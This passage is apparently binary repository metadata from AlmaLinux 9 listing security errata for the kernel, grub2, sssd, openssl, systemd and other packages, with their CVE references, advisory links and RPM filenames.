024-57993.htmlCVE-2024-57993CVE-2024-57993https://www.redhat.com/security/data/cve/CVE-2024-57995.htmlCVE-2024-57995CVE-2024-57995https://www.redhat.com/security/data/cve/CVE-2024-57998.htmlCVE-2024-57998CVE-2024-57998https://www.redhat.com/security/data/cve/CVE-2024-58012.htmlCVE-2024-58012CVE-2024-58012https://www.redhat.com/security/data/cve/CVE-2024-58014.htmlCVE-2024-58014CVE-2024-58014https://www.redhat.com/security/data/cve/CVE-2024-58015.htmlCVE-2024-58015CVE-2024-58015https://www.redhat.com/security/data/cve/CVE-2024-58057.htmlCVE-2024-58057CVE-2024-58057https://www.redhat.com/security/data/cve/CVE-2024-58062.htmlCVE-2024-58062CVE-2024-58062https://www.redhat.com/security/data/cve/CVE-2024-58068.htmlCVE-2024-58068CVE-2024-58068https://www.redhat.com/security/data/cve/CVE-2024-58072.htmlCVE-2024-58072CVE-2024-58072https://www.redhat.com/security/data/cve/CVE-2024-58075.htmlCVE-2024-58075CVE-2024-58075https://www.redhat.com/security/data/cve/CVE-2024-58077.htmlCVE-2024-58077CVE-2024-58077https://www.redhat.com/security/data/cve/CVE-2024-58083.htmlCVE-2024-58083CVE-2024-58083https://www.redhat.com/security/data/cve/CVE-2024-58088.htmlCVE-2024-58088CVE-2024-58088https://www.redhat.com/security/data/cve/CVE-2025-21631.htmlCVE-2025-21631CVE-2025-21631https://www.redhat.com/security/data/cve/CVE-2025-21647.htmlCVE-2025-21647CVE-2025-21647https://www.redhat.com/security/data/cve/CVE-2025-21648.htmlCVE-2025-21648CVE-2025-21648https://www.redhat.com/security/data/cve/CVE-2025-21671.htmlCVE-2025-21671CVE-2025-21671https://www.redhat.com/security/data/cve/CVE-2025-21672.htmlCVE-2025-21672CVE-2025-21672https://www.redhat.com/security/data/cve/CVE-2025-21691.htmlCVE-2025-21691CVE-2025-21691https://www.redhat.com/security/data/cve/CVE-2025-21693.htmlCVE-2025-21693CVE-2025-21693https://www.redhat.com/security/data/cve/CVE-2025-21696.htmlCVE-2025-21696CVE-2025-21696https://www.redhat.com/security/data/cve/CVE-2025-21702.htmlCVE-2025-21702CVE-2025-21702https://www.redhat.com/security/data/cve/CVE-2025-21714.htmlCVE-2025-21714CVE-2025-21714https://www.redhat.com/security/data/cve/CVE-2025-21726.htmlCVE-2025-21726CVE-2025-21726https://www.redhat.com/security/data/cve/CVE-2025-21728.htmlCVE-2025-21728CVE-2025-21728https://www.redhat.com/security/data/cve/CVE-2025-21729.htmlCVE-2025-21729CVE-2025-21729https://www.redhat.com/security/data/cve/CVE-2025-21738.htmlCVE-2025-21738CVE-2025-21738https://www.redhat.com/security/data/cve/CVE-2025-21739.htmlCVE-2025-21739CVE-2025-21739https://www.redhat.com/security/data/cve/CVE-2025-21745.htmlCVE-2025-21745CVE-2025-21745https://www.redhat.com/security/data/cve/CVE-2025-21746.htmlCVE-2025-21746CVE-2025-21746https://www.redhat.com/security/data/cve/CVE-2025-21765.htmlCVE-2025-21765CVE-2025-21765https://www.redhat.com/security/data/cve/CVE-2025-21786.htmlCVE-2025-21786CVE-2025-21786https://www.redhat.com/security/data/cve/CVE-2025-21787.htmlCVE-2025-21787CVE-2025-21787https://www.redhat.com/security/data/cve/CVE-2025-21790.htmlCVE-2025-21790CVE-2025-21790https://www.redhat.com/security/data/cve/CVE-2025-21791.htmlCVE-2025-21791CVE-2025-21791https://www.redhat.com/security/data/cve/CVE-2025-21795.htmlCVE-2025-21795CVE-2025-21795https://www.redhat.com/security/data/cve/CVE-2025-21796.htmlCVE-2025-21796CVE-2025-21796https://www.redhat.com/security/data/cve/CVE-2025-21806.htmlCVE-2025-21806CVE-2025-21806https://www.redhat.com/security/data/cve/CVE-2025-21826.htmlCVE-2025-21826CVE-2025-21826https://www.redhat.com/security/data/cve/CVE-2025-21828.htmlCVE-2025-21828CVE-2025-21828https://www.redhat.com/security/data/cve/CVE-2025-21829.htmlCVE-2025-21829CVE-2025-21829https://www.redhat.com/security/data/cve/CVE-2025-21837.htmlCVE-2025-21837CVE-2025-21837https://www.redhat.com/security/data/cve/CVE-2025-21839.htmlCVE-2025-21839CVE-2025-21839https://www.redhat.com/security/data/cve/CVE-2025-21844.htmlCVE-2025-21844CVE-2025-21844https://www.redhat.com/security/data/cve/CVE-2025-21846.htmlCVE-2025-21846CVE-2025-21846https://www.redhat.com/security/data/cve/CVE-2025-21847.htmlCVE-2025-21847CVE-2025-21847https://www.redhat.com/security/data/cve/CVE-2025-21848.htmlCVE-2025-21848CVE-2025-21848https://www.redhat.com/security/data/cve/CVE-2025-21851.htmlCVE-2025-21851CVE-2025-21851https://www.redhat.com/security/data/cve/CVE-2025-21853.htmlCVE-2025-21853CVE-2025-21853https://www.redhat.com/security/data/cve/CVE-2025-21855.htmlCVE-2025-21855CVE-2025-21855https://www.redhat.com/security/data/cve/CVE-2025-21861.htmlCVE-2025-21861CVE-2025-21861https://www.redhat.com/security/data/cve/CVE-2025-21863.htmlCVE-2025-21863CVE-2025-21863https://www.redhat.com/security/data/cve/CVE-2025-21864.htmlCVE-2025-21864CVE-2025-21864https://www.redhat.com/security/data/cve/CVE-2025-22056.htmlCVE-2025-22056CVE-2025-22056https://www.redhat.com/security/data/cve/CVE-2025-22097.htmlCVE-2025-22097CVE-2025-22097https://www.redhat.com/security/data/cve/CVE-2025-37994.htmlCVE-2025-37994CVE-2025-37994https://www.redhat.com/security/data/cve/CVE-2025-38116.htmlCVE-2025-38116CVE-2025-38116https://www.redhat.com/security/data/cve/CVE-2025-38396.htmlCVE-2025-38396CVE-2025-38396zkernel-debug-modules-extra-5.14.0-611.5.1.el9_7.x86_64.rpm%zkernel-uki-virt-addons-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-abi-stablelists-5.14.0-611.5.1.el9_7.noarch.rpm zkernel-debug-uki-virt-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-5.14.0-611.5.1.el9_7.x86_64.rpm!zkernel-modules-core-5.14.0-611.5.1.el9_7.x86_64.rpm"zkernel-uki-virt-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-tools-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-modules-extra-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-modules-core-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-modules-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-core-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-tools-libs-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-modules-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-core-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-modules-extra-5.14.0-611.5.1.el9_7.x86_64.rpm%zkernel-uki-virt-addons-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-abi-stablelists-5.14.0-611.5.1.el9_7.noarch.rpm zkernel-debug-uki-virt-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-5.14.0-611.5.1.el9_7.x86_64.rpm!zkernel-modules-core-5.14.0-611.5.1.el9_7.x86_64.rpm"zkernel-uki-virt-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-tools-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-modules-extra-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-modules-core-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-modules-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-core-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-tools-libs-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-debug-modules-5.14.0-611.5.1.el9_7.x86_64.rpmzkernel-core-5.14.0-611.5.1.el9_7.x86_64.rpm���F�5
�1�_BBBBBBBBBBBBBBBBsecurityModerate: grub2 security update&���Mhttps://access.redhat.com/errata/RHSA-2025:20532RHSA-2025:20532RHSA-2025:20532https://access.redhat.com/security/cve/CVE-2024-45777CVE-2024-45777CVE-2024-45777https://bugzilla.redhat.com/23463432346343https://errata.almalinux.org/9/ALSA-2025-20532.htmlALSA-2025:20532ALSA-2025:20532�=�grub2-efi-aa64-modules-2.06-114.el9_7.alma.1.noarch.rpm�k�grub2-pc-2.06-114.el9_7.alma.1.x86_64.rpm�>�grub2-efi-x64-modules-2.06-114.el9_7.alma.1.noarch.rpm�<�grub2-common-2.06-114.el9_7.alma.1.noarch.rpm�j�grub2-efi-x64-cdboot-2.06-114.el9_7.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-114.el9_7.alma.1.x86_64.rpm�i�grub2-efi-x64-2.06-114.el9_7.alma.1.x86_64.rpm�?�grub2-pc-modules-2.06-114.el9_7.alma.1.noarch.rpm�l�grub2-tools-2.06-114.el9_7.alma.1.x86_64.rpm�o�grub2-tools-minimal-2.06-114.el9_7.alma.1.x86_64.rpm�n�grub2-tools-extra-2.06-114.el9_7.alma.1.x86_64.rpm�=�grub2-efi-aa64-modules-2.06-114.el9_7.alma.1.noarch.rpm�k�grub2-pc-2.06-114.el9_7.alma.1.x86_64.rpm�>�grub2-efi-x64-modules-2.06-114.el9_7.alma.1.noarch.rpm�<�grub2-common-2.06-114.el9_7.alma.1.noarch.rpm�j�grub2-efi-x64-cdboot-2.06-114.el9_7.alma.1.x86_64.rpm�m�grub2-tools-efi-2.06-114.el9_7.alma.1.x86_64.rpm�i�grub2-efi-x64-2.06-114.el9_7.alma.1.x86_64.rpm�?�grub2-pc-modules-2.06-114.el9_7.alma.1.noarch.rpm�l�grub2-tools-2.06-114.el9_7.alma.1.x86_64.rpm�o�grub2-tools-minimal-2.06-114.el9_7.alma.1.x86_64.rpm�n�grub2-tools-extra-2.06-114.el9_7.alma.1.x86_64.rpm���R�6
�7�rBBBsecurityLow: shadow-utils security update&�9��Y�https://access.redhat.com/errata/RHSA-2025:20559RHSA-2025:20559RHSA-2025:20559https://access.redhat.com/security/cve/CVE-2024-56433CVE-2024-56433CVE-2024-56433https://bugzilla.redhat.com/23341652334165https://errata.almalinux.org/9/ALSA-2025-20559.htmlALSA-2025:20559ALSA-2025:20559�~�shadow-utils-4.9-15.el9.x86_64.rpm�4�shadow-utils-subid-4.9-15.el9.x86_64.rpm�4�shadow-utils-subid-4.9-15.el9.i686.rpm�~�shadow-utils-4.9-15.el9.x86_64.rpm�4�shadow-utils-subid-4.9-15.el9.x86_64.rpm�4�shadow-utils-subid-4.9-15.el9.i686.rpm����7
�6�xBsecurityImportant: sqlite security update&'��`�	https://access.redhat.com/errata/RHSA-2025:20936RHSA-2025:20936RHSA-2025:20936https://access.redhat.com/security/cve/CVE-2025-6965CVE-2025-6965CVE-2025-6965https://bugzilla.redhat.com/23801492380149https://errata.almalinux.org/9/ALSA-2025-20936.htmlALSA-2025:20936ALSA-2025:20936�\�sqlite-libs-3.34.1-9.el9_7.x86_64.rpm�\�sqlite-libs-3.34.1-9.el9_7.i686.rpm�\�sqlite-libs-3.34.1-9.el9_7.x86_64.rpm�\�sqlite-libs-3.34.1-9.el9_7.i686.rpm����8
�7�{BBsecurityModerate: libssh security update&��i�https://access.redhat.com/errata/RHSA-2025:20943RHSA-2025:20943RHSA-2025:20943https://access.redhat.com/security/cve/CVE-2025-5318CVE-2025-5318CVE-2025-5318https://bugzilla.redhat.com/23691312369131https://errata.almalinux.org/9/ALSA-2025-20943.htmlALSA-2025:20943ALSA-2025:20943�A�9libssh-0.10.4-15.el9_7.x86_64.rpm��9libssh-config-0.10.4-15.el9_7.noarch.rpm�A�9libssh-0.10.4-15.el9_7.i686.rpm�A�9libssh-0.10.4-15.el9_7.x86_64.rpm��9libssh-config-0.10.4-15.el9_7.noarch.rpm�A�9libssh-0.10.4-15.el9_7.i686.rpm���C�9
�8�BsecurityModerate: vim security update&��t�zhttps://access.redhat.com/errata/RHSA-2025:20945RHSA-2025:20945RHSA-2025:20945https://access.redhat.com/security/cve/CVE-2025-53905CVE-2025-53905CVE-2025-53905https://access.redhat.com/security/cve/CVE-2025-53906CVE-2025-53906CVE-2025-53906https://bugzilla.redhat.com/23803602380360https://bugzilla.redhat.com/23803622380362https://errata.almalinux.org/9/ALSA-2025-20945.htmlALSA-2025:20945ALSA-2025:20945�S�vim-minimal-8.2.2637-23.el9_7.x86_64.rpm�7�vim-filesystem-8.2.2637-23.el9_7.noarch.rpm�S�vim-minimal-8.2.2637-23.el9_7.x86_64.rpm�7�vim-filesystem-8.2.2637-23.el9_7.noarch.rpm���T�:
�9�BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: sssd security update&'��n�/https://access.redhat.com/errata/RHSA-2025:20954RHSA-2025:20954RHSA-2025:20954https://access.redhat.com/security/cve/CVE-2025-11561CVE-2025-11561CVE-2025-11561https://bugzilla.redhat.com/24027272402727https://errata.almalinux.org/9/ALSA-2025-20954.htmlALSA-2025:20954ALSA-2025:20954#�$sssd-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-passkey-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-ipa-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-dbus-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-tools-2.9.7-4.el9_7.1.x86_64.rpm�
$sssd-proxy-2.9.7-4.el9_7.1.x86_64.rpm�x$python3-libipa_hbac-2.9.7-4.el9_7.1.x86_64.rpm�z$python3-sss-2.9.7-4.el9_7.1.x86_64.rpm�5$sssd-client-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-krb5-2.9.7-4.el9_7.1.x86_64.rpm�y$python3-libsss_nss_idmap-2.9.7-4.el9_7.1.x86_64.rpm�-$libsss_certmap-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-kcm-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-common-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-common-pac-2.9.7-4.el9_7.1.x86_64.rpm�q$libsss_sudo-2.9.7-4.el9_7.1.x86_64.rpm�|$python3-sssdconfig-2.9.7-4.el9_7.1.noarch.rpm�*$libipa_hbac-2.9.7-4.el9_7.1.i686.rpm�$sssd-polkit-rules-2.9.7-4.el9_7.1.x86_64.rpm�*$libipa_hbac-2.9.7-4.el9_7.1.x86_64.rpm�{$python3-sss-murmur-2.9.7-4.el9_7.1.x86_64.rpm�	$sssd-ldap-2.9.7-4.el9_7.1.x86_64.rpm�.$libsss_idmap-2.9.7-4.el9_7.1.i686.rpm�0$libsss_simpleifp-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-winbind-idmap-2.9.7-4.el9_7.1.x86_64.rpm�0$libsss_simpleifp-2.9.7-4.el9_7.1.i686.rpm�$sssd-krb5-common-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-ad-2.9.7-4.el9_7.1.x86_64.rpm�
$sssd-nfs-idmap-2.9.7-4.el9_7.1.x86_64.rpm�/$libsss_nss_idmap-2.9.7-4.el9_7.1.x86_64.rpm�5$sssd-client-2.9.7-4.el9_7.1.i686.rpm�p$libsss_autofs-2.9.7-4.el9_7.1.x86_64.rpm�/$libsss_nss_idmap-2.9.7-4.el9_7.1.i686.rpm�-$libsss_certmap-2.9.7-4.el9_7.1.i686.rpm�.$libsss_idmap-2.9.7-4.el9_7.1.x86_64.rpm#�$sssd-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-passkey-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-ipa-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-dbus-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-tools-2.9.7-4.el9_7.1.x86_64.rpm�
$sssd-proxy-2.9.7-4.el9_7.1.x86_64.rpm�x$python3-libipa_hbac-2.9.7-4.el9_7.1.x86_64.rpm�z$python3-sss-2.9.7-4.el9_7.1.x86_64.rpm�5$sssd-client-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-krb5-2.9.7-4.el9_7.1.x86_64.rpm�y$python3-libsss_nss_idmap-2.9.7-4.el9_7.1.x86_64.rpm�-$libsss_certmap-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-kcm-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-common-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-common-pac-2.9.7-4.el9_7.1.x86_64.rpm�q$libsss_sudo-2.9.7-4.el9_7.1.x86_64.rpm�|$python3-sssdconfig-2.9.7-4.el9_7.1.noarch.rpm�*$libipa_hbac-2.9.7-4.el9_7.1.i686.rpm�$sssd-polkit-rules-2.9.7-4.el9_7.1.x86_64.rpm�*$libipa_hbac-2.9.7-4.el9_7.1.x86_64.rpm�{$python3-sss-murmur-2.9.7-4.el9_7.1.x86_64.rpm�	$sssd-ldap-2.9.7-4.el9_7.1.x86_64.rpm�.$libsss_idmap-2.9.7-4.el9_7.1.i686.rpm�0$libsss_simpleifp-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-winbind-idmap-2.9.7-4.el9_7.1.x86_64.rpm�0$libsss_simpleifp-2.9.7-4.el9_7.1.i686.rpm�$sssd-krb5-common-2.9.7-4.el9_7.1.x86_64.rpm�$sssd-ad-2.9.7-4.el9_7.1.x86_64.rpm�
$sssd-nfs-idmap-2.9.7-4.el9_7.1.x86_64.rpm�/$libsss_nss_idmap-2.9.7-4.el9_7.1.x86_64.rpm�5$sssd-client-2.9.7-4.el9_7.1.i686.rpm�p$libsss_autofs-2.9.7-4.el9_7.1.x86_64.rpm�/$libsss_nss_idmap-2.9.7-4.el9_7.1.i686.rpm�-$libsss_certmap-2.9.7-4.el9_7.1.i686.rpm�.$libsss_idmap-2.9.7-4.el9_7.1.x86_64.rpm�ɵ��;
�:�ABBBsecurityModerate: openssl security update&���Zhttps://access.redhat.com/errata/RHSA-2025:21255RHSA-2025:21255RHSA-2025:21255https://access.redhat.com/security/cve/CVE-2025-9230CVE-2025-9230CVE-2025-9230https://bugzilla.redhat.com/23960542396054https://errata.almalinux.org/9/ALSA-2025-21255.htmlALSA-2025:21255ALSA-2025:21255��|openssl-libs-3.5.1-4.el9_7.x86_64.rpm�:�|openssl-3.5.1-4.el9_7.x86_64.rpm��|openssl-libs-3.5.1-4.el9_7.i686.rpm��|openssl-libs-3.5.1-4.el9_7.x86_64.rpm�:�|openssl-3.5.1-4.el9_7.x86_64.rpm��|openssl-libs-3.5.1-4.el9_7.i686.rpm�ɵ�s�<
�;�FBsecurityModerate: kernel security update&��w�https://access.redhat.com/errata/RHSA-2025:21926RHSA-2025:21926RHSA-2025:21926https://access.redhat.com/security/cve/CVE-2025-39843CVE-2025-39843CVE-2025-39843https://bugzilla.redhat.com/23969412396941https://errata.almalinux.org/9/ALSA-2025-21926.htmlALSA-2025:21926ALSA-2025:21926�kernel-abi-stablelists-5.14.0-611.9.1.el9_7.noarch.rpm�kernel-5.14.0-611.9.1.el9_7.x86_64.rpm�kernel-abi-stablelists-5.14.0-611.9.1.el9_7.noarch.rpm�kernel-5.14.0-611.9.1.el9_7.x86_64.rpm�ɵ�=�=
�<�IBsecurityImportant: expat security update&'��v�&https://access.redhat.com/errata/RHSA-2025:22175RHSA-2025:22175RHSA-2025:22175https://access.redhat.com/security/cve/CVE-2025-59375CVE-2025-59375CVE-2025-59375https://bugzilla.redhat.com/23951082395108https://errata.almalinux.org/9/ALSA-2025-22175.htmlALSA-2025:22175ALSA-2025:22175�"�{expat-2.5.0-5.el9_7.1.i686.rpm�"�{expat-2.5.0-5.el9_7.1.x86_64.rpm�"�{expat-2.5.0-5.el9_7.1.i686.rpm�"�{expat-2.5.0-5.el9_7.1.x86_64.rpm����>
�=�LBBBsecurityModerate: libxml2 security update&���,https://access.redhat.com/errata/RHSA-2025:22376RHSA-2025:22376RHSA-2025:22376https://access.redhat.com/security/cve/CVE-2025-9714CVE-2025-9714CVE-2025-9714https://bugzilla.redhat.com/23926052392605https://errata.almalinux.org/9/ALSA-2025-22376.htmlALSA-2025:22376ALSA-2025:22376��libxml2-2.9.13-14.el9_7.i686.rpm��libxml2-2.9.13-14.el9_7.x86_64.rpm�O�python3-libxml2-2.9.13-14.el9_7.x86_64.rpm��libxml2-2.9.13-14.el9_7.i686.rpm��libxml2-2.9.13-14.el9_7.x86_64.rpm�O�python3-libxml2-2.9.13-14.el9_7.x86_64.rpm����?
�>�QBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��H�;https://access.redhat.com/errata/RHSA-2025:22405RHSA-2025:22405RHSA-2025:22405https://access.redhat.com/security/cve/CVE-2025-38724CVE-2025-38724CVE-2025-38724https://access.redhat.com/security/cve/CVE-2025-39864CVE-2025-39864CVE-2025-39864https://access.redhat.com/security/cve/CVE-2025-39898CVE-2025-39898CVE-2025-39898https://access.redhat.com/security/cve/CVE-2025-39918CVE-2025-39918CVE-2025-39918https://access.redhat.com/security/cve/CVE-2025-39955CVE-2025-39955CVE-2025-39955https://access.redhat.com/security/cve/CVE-2025-39981CVE-2025-39981CVE-2025-39981https://access.redhat.com/security/cve/CVE-2025-40058CVE-2025-40058CVE-2025-40058https://access.redhat.com/security/cve/CVE-2025-40185CVE-2025-40185CVE-2025-40185https://bugzilla.redhat.com/23931722393172https://bugzilla.redhat.com/23969342396934https://bugzilla.redhat.com/24005982400598https://bugzilla.redhat.com/24006282400628https://bugzilla.redhat.com/24026992402699https://bugzilla.redhat.com/24041052404105https://bugzilla.redhat.com/24067762406776https://bugzilla.redhat.com/24147412414741https://errata.almalinux.org/9/ALSA-2025-22405.htmlALSA-2025:22405ALSA-2025:22405!kkernel-modules-core-5.14.0-611.11.1.el9_7.x86_64.rpm"kkernel-uki-virt-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-abi-stablelists-5.14.0-611.11.1.el9_7.noarch.rpmkkernel-modules-extra-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-modules-core-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-core-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-modules-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-core-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-modules-extra-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-5.14.0-611.11.1.el9_7.x86_64.rpm kkernel-debug-uki-virt-5.14.0-611.11.1.el9_7.x86_64.rpm%kkernel-uki-virt-addons-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-tools-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-tools-libs-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-modules-5.14.0-611.11.1.el9_7.x86_64.rpm!kkernel-modules-core-5.14.0-611.11.1.el9_7.x86_64.rpm"kkernel-uki-virt-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-abi-stablelists-5.14.0-611.11.1.el9_7.noarch.rpmkkernel-modules-extra-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-modules-core-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-core-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-modules-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-core-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-modules-extra-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-debug-5.14.0-611.11.1.el9_7.x86_64.rpm kkernel-debug-uki-virt-5.14.0-611.11.1.el9_7.x86_64.rpm%kkernel-uki-virt-addons-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-tools-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-tools-libs-5.14.0-611.11.1.el9_7.x86_64.rpmkkernel-modules-5.14.0-611.11.1.el9_7.x86_64.rpm��ۅm�@
�?�pBBBBBBBBBBBBBBBBBsecurityModerate: systemd security update&���)https://access.redhat.com/errata/RHSA-2025:22660RHSA-2025:22660RHSA-2025:22660https://access.redhat.com/security/cve/CVE-2025-4598CVE-2025-4598CVE-2025-4598https://bugzilla.redhat.com/23692422369242https://errata.almalinux.org/9/ALSA-2025-22660.htmlALSA-2025:22660ALSA-2025:22660�]�
systemd-252-55.el9_7.7.alma.1.x86_64.rpm�_�
systemd-libs-252-55.el9_7.7.alma.1.x86_64.rpm�D�
systemd-resolved-252-55.el9_7.7.alma.1.x86_64.rpm�]�
systemd-252-55.el9_7.7.alma.1.i686.rpm�^�
systemd-container-252-55.el9_7.7.alma.1.x86_64.rpm�^�
systemd-container-252-55.el9_7.7.alma.1.i686.rpm�p�
systemd-rpm-macros-252-55.el9_7.7.alma.1.noarch.rpm�_�
systemd-libs-252-55.el9_7.7.alma.1.i686.rpm�}�
rhel-net-naming-sysattrs-252-55.el9_7.7.alma.1.noarch.rpm�B�
systemd-oomd-252-55.el9_7.7.alma.1.x86_64.rpm�E�
systemd-udev-252-55.el9_7.7.alma.1.x86_64.rpm�C�
systemd-pam-252-55.el9_7.7.alma.1.x86_64.rpm�]�
systemd-252-55.el9_7.7.alma.1.x86_64.rpm�_�
systemd-libs-252-55.el9_7.7.alma.1.x86_64.rpm�D�
systemd-resolved-252-55.el9_7.7.alma.1.x86_64.rpm�]�
systemd-252-55.el9_7.7.alma.1.i686.rpm�^�
systemd-container-252-55.el9_7.7.alma.1.x86_64.rpm�^�
systemd-container-252-55.el9_7.7.alma.1.i686.rpm�p�
systemd-rpm-macros-252-55.el9_7.7.alma.1.noarch.rpm�_�
systemd-libs-252-55.el9_7.7.alma.1.i686.rpm�}�
rhel-net-naming-sysattrs-252-55.el9_7.7.alma.1.noarch.rpm�B�
systemd-oomd-252-55.el9_7.7.alma.1.x86_64.rpm�E�
systemd-udev-252-55.el9_7.7.alma.1.x86_64.rpm�C�
systemd-pam-252-55.el9_7.7.alma.1.x86_64.rpm��ƗC�A
��CBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��,�Shttps://access.redhat.com/errata/RHSA-2025:22865RHSA-2025:22865RHSA-2025:22865https://access.redhat.com/security/cve/CVE-2025-39925CVE-2025-39925CVE-2025-39925https://access.redhat.com/security/cve/CVE-2025-39979CVE-2025-39979CVE-2025-39979https://bugzilla.redhat.com/24006292400629https://bugzilla.redhat.com/24041092404109https://errata.almalinux.org/9/ALSA-2025-22865.htmlALSA-2025:22865ALSA-2025:22865lkernel-tools-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-tools-libs-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-modules-extra-5.14.0-611.13.1.el9_7.x86_64.rpm!lkernel-modules-core-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-abi-stablelists-5.14.0-611.13.1.el9_7.noarch.rpmlkernel-debug-modules-5.14.0-611.13.1.el9_7.x86_64.rpm%lkernel-uki-virt-addons-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-modules-extra-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-modules-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-core-5.14.0-611.13.1.el9_7.x86_64.rpm"lkernel-uki-virt-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-modules-core-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-core-5.14.0-611.13.1.el9_7.x86_64.rpm lkernel-debug-uki-virt-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-tools-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-tools-libs-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-modules-extra-5.14.0-611.13.1.el9_7.x86_64.rpm!lkernel-modules-core-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-abi-stablelists-5.14.0-611.13.1.el9_7.noarch.rpmlkernel-debug-modules-5.14.0-611.13.1.el9_7.x86_64.rpm%lkernel-uki-virt-addons-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-modules-extra-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-modules-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-core-5.14.0-611.13.1.el9_7.x86_64.rpm"lkernel-uki-virt-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-debug-modules-core-5.14.0-611.13.1.el9_7.x86_64.rpmlkernel-core-5.14.0-611.13.1.el9_7.x86_64.rpm lkernel-debug-uki-virt-5.14.0-611.13.1.el9_7.x86_64.rpm�ʊ��B
��bBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'���Mhttps://access.redhat.com/errata/RHSA-2025:23241RHSA-2025:23241RHSA-2025:23241https://access.redhat.com/security/cve/CVE-2025-38499CVE-2025-38499CVE-2025-38499https://access.redhat.com/security/cve/CVE-2025-39966CVE-2025-39966CVE-2025-39966https://access.redhat.com/security/cve/CVE-2025-40176CVE-2025-40176CVE-2025-40176https://bugzilla.redhat.com/23876702387670https://bugzilla.redhat.com/24041072404107https://bugzilla.redhat.com/24145242414524https://errata.almalinux.org/9/ALSA-2025-23241.htmlALSA-2025:23241ALSA-2025:23241%mkernel-uki-virt-addons-5.14.0-611.16.1.el9_7.x86_64.rpmmkernel-debug-5.14.0-611.16.1.el9_7.x86_64.rpmmkernel-debug-modules-5.14.0-611.16.1.el9_7.x86_64.rpmmkernel-tools-5.14.0-611.16.1.el9_7.x86_64.rpm!mkernel-modules-core-5.14.0-611.16.1.el9_7.x86_64.rpmmkernel-modu